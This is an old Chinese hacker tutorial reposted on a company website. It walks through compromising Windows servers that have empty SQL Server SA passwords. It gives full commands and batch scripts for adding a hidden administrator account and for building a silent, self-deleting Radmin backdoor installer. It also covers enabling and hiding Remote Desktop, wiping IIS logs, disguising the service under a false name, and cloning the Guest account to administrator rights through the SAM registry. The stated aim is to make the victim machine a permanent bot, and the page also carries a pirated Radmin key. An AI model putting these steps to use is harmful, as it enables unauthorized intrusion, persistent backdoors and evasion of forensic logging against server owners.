云联天下首页 |  登陆 |  注册 |  密码找回 |  关于我们 | 加入收藏 
首页技术资料系统/服务器→黑客经验谈入侵3389起源完整编 【字号: 】 【背景色 杏仁黄 秋叶褐 胭脂红 芥末绿 天蓝 雪青 灰 银河白(默认色)

黑客经验谈入侵3389起源完整编

网址来源:http://www.kehui.net发布时间: 2007-04-07 01:01:20
    这多是本人多年下来的经验。

  工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:

  08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。

  一.扫到SA弱口令(自动攻击器)

  二.用SQLTOOLS连上去建一个用户






net start telnet                         开telnet服务  

net user mint mint /add 添加用户mint密码为mint

net localgroup administrators mint /add 将帐号mint升级为管理员

  三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

  制作RAD.EXE过程:

  1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;

  2、在本地设置服务端(一定要生成);

  设置密码-->>设置连接端口(默认4489)-->>生成

  3、导出注册表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的键值为1.reg;

  4、编写一个批处理,并命名为u.bat;






@echo off 
net stop r_server

   5、写第二个批处理,r.bat,内容为:






@echo off 
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@net start r_server
@del rad.exe
@del 1.reg
@del r.bat
@del u.bat

  6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;

  7、将Rad.rar制作成自解压文件;

  选择Default.sfx的自释放模块-->>高级自释放选项

  -->>常规

  释放路径:%systemroot%\system32

  安装程序:释放后运行:r.bat 释放前运行u.bat

  -->>摸式

  缄默模式:全部隐藏 覆盖方式:覆盖所有文件

  -->>确定-->>确定

  生成完成。


    四.用RADMIN客服端连接


  上传文件到c:\WINNT(XP是windows):

  port.bat(如果是在XP下,这个要把里面的WINNT改为Windows)

  query.exe quser.exe

  SC.exe

  CleanIISLog.exe.exe

  3389.exe

  psu.exe

  最好再上传一个反弹后门RADMIN进入TELNET。

  运行c:\winnt\3389.exe,重启肉鸡。

  五.重启后用远程桌面远程器连上去

  这里就有时会出现个问题。

  使用3389登陆,发现登陆用户已满,不用怕,我们把他踢出去。

  telnet对方ip,发现需要 NTLM 身份验证。我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

  找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint,telnet对方ip,直接可以登陆对方电脑了。

  使用命令:

  c:\query user (查看对方目前终端登陆状况。)

  运行命令:

  c:\logoff 1(踢出去一个管理者)

  再用c:\query user检查一便~~(这就是为什么不马上用1.bat了)

  六.连上后..在cmd下运行

  c:\winnt\log . 自己的IP .(擦PP)

  c:\winnet\1.bat (删除覆盖查看当前在线用户文件)

  七.打SA空口令补丁

  程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)


  -->>Windowst身位验证登陆

  复制一下代码:SELMIS






if exists (select * from  

dbo.sysobjects where id = object_id(N’[dbo].[xp_cmdshell]’) and

OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

exec sp_dropextendedproc N’[dbo].[xp_cmdshell]’

GO

   按F5(运行),关了退出SQL Server再用SQL Server身位验证进一次,退出(这是为了不留下记录)。


  八.改3389端口和服务名称


  修改服务器端的端口设置,注册表有2个地方需要修改。

    第二个地方:

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp],PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。


    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。


  要重启系统才能用新端口连。(不急..改了他的服务名再重启系统吧)

  导出3389服务的

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

  的键值为mm.reg文件。编辑mm.reg文件,替换TermService为Alerter(错误警告服务..别的服务也行) 。再把第十行的"Description"="(这里是服务说明,改为你所换的服务说明,这里改为通知所选用户和计算机有关系统管理级警报。)"第十一行的"DisplayName"="(这里是服务名称,改为你所换的服务名称,这里改为Alerter)。保存,再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)。

  再在CMD下






CD c:\winnt\system32  
copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)
CD C:\winnt
sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe(这里是从新定向
Alerter服务文件.服务名一定要区分大小写A要大写)

  九.注消后(注消比直接关要好些)用Radmin重启肉鸡

  十.使用被禁用的帐户[Guest]登陆,删除自己开始建的帐号

  1.使用psu.exe展开注册表到

  HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

  用法:[psu -p regedit -i pid]

  Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值。

  如:psu –p regedit –i 157

  将Guest克成管理员权限,克成管理员权限的方法:

  找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator的类型值。

  在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。

  导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Guest和他相应的类型值的数据),然后删除Guest的配置。

  2.查看计算机管理中帐户列表,刷新这时候会出现错误[找不到帐户](跳过这步也行)。

  3.将Guest的配置(二个REG文件导进注册表)。

  4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]。






net user Guest **** [修改密码] 
net user Guest /active:yes
net user Guest /active:no[命令行下禁用Guest]

  5.实验被禁止的帐户Guest是否可用。

  6.用Guest登陆后删除自己建的帐号。






net user mint /del

  整个过程结束。

  最后最好把RADMIN的服务也改了,多留个后门多条路,呵呵。整个过程全部结束,这机子就真正变成你的肉鸡了。


爱妮 

相关新闻
v 浅谈linux优化及安全配置 2007-04-07 01:05:24
v Linux下的通用线程池创建(2) 2007-04-07 01:11:05
v Linux下的通用线程池创建(1) 2007-04-07 01:13:18
v Linux下jsp环境:apache,tomcat配置 2007-04-07 01:42:25
v JAVA/JSP学习系列之 Tomcat安装 2007-04-07 01:43:21
v JAVA/JSP学习系列之JDK的安装 2007-04-07 01:46:08
v Apache服务器 2007-04-10 01:50:27
v 快速安装Windows系统的独家秘籍 2007-04-10 01:53:56
v Windows Vista弹出窗口及关机优化 2007-04-10 01:54:58
v 无需等待 让Windows XP急速关机 2007-04-10 01:55:52
  最新新闻
智慧家居
智慧家居颠覆传统智能家居
智慧云谷让智能家居变成有智慧的
智慧云谷引领智慧家居新生活
科技改变生活 智慧云谷智慧家居系
智慧家居领航者,智慧云谷助你玩
智能家居如何赢得市场美誉度?
智慧云谷智慧家居:创业者有无限
WiFi智能家居你还在用?这样的智
互联网+助推智能家居产业
智慧云谷为您打造真正的智能家居
智能家居产业需要的不是单品,而
新家如何选择开关?智慧云谷iWis
智能传感器-世界首款“智”为你的
智慧云谷开关智能安防智能空气质
智能开关品牌,如何选择智能开关
秋季干燥,智慧家居温湿度传感器
传感器助力智慧家居 感知爱家
iWiscloud智能触摸开关缔造家居装

  最新帖子
 ※这么冷清  [gabc111]
 ※植树节,智慧云谷为您  [于文强]
 ※智慧云谷智慧家居,国  [于文强]
 ※好消息,智慧云谷新风  [于文强]
 ※新家如何选择开关?智  [于文强]
 ※智慧云谷|2016广州国际  [于文强]
 ※手机APP操作有问题  [ssy11407]
 ※智慧云谷智慧家居将在  [cici]
 ※上传下载  [cici]
 ※下载智慧家居  [apple2008]
 ※秋季干燥,智慧家居温  [apple2008]
 ※智慧家居紧扣热点 安全  [apple2008]
 ※办公大楼如何智慧化管  [apple2008]
 ※智慧云谷工业自控的优  [apple2008]
 ※传感器助力智慧家居 感  [apple2008]
 ※智能开关品牌,如何选  [apple2008]
 ※智慧云谷开关智能安防  [apple2008]
 ※没有专业人员,如何安  [apple2008]
 ※烟台智慧云谷董事长任  [apple2008]
 ※互联网+助推智能家居产  [apple2008]
钯碳回收 硝酸银回收 银浆回收 银焊条回收 回收银浆 氯化钯回收 氯化钯回收 氧化钯回收 回收硝酸钯 钯水回收价格 海绵钯回收 钯炭回收价格 回收镀金板 深圳钯碳回收 镇江氯化钯回收 杭州钯浆回收 银浆回收多少钱 回收钯碳公司 硝酸银的价格 那里有回收金 氯化钯回收价格 江苏擦银布回收 硝酸银价格 德州钯粉回收 银铜回收 回收钯粉 回收铂碳催化剂 佛山钯碳回收 金盐回收价格 海绵钯回收 钯碳高价回收 钯回收价格 钯炭回收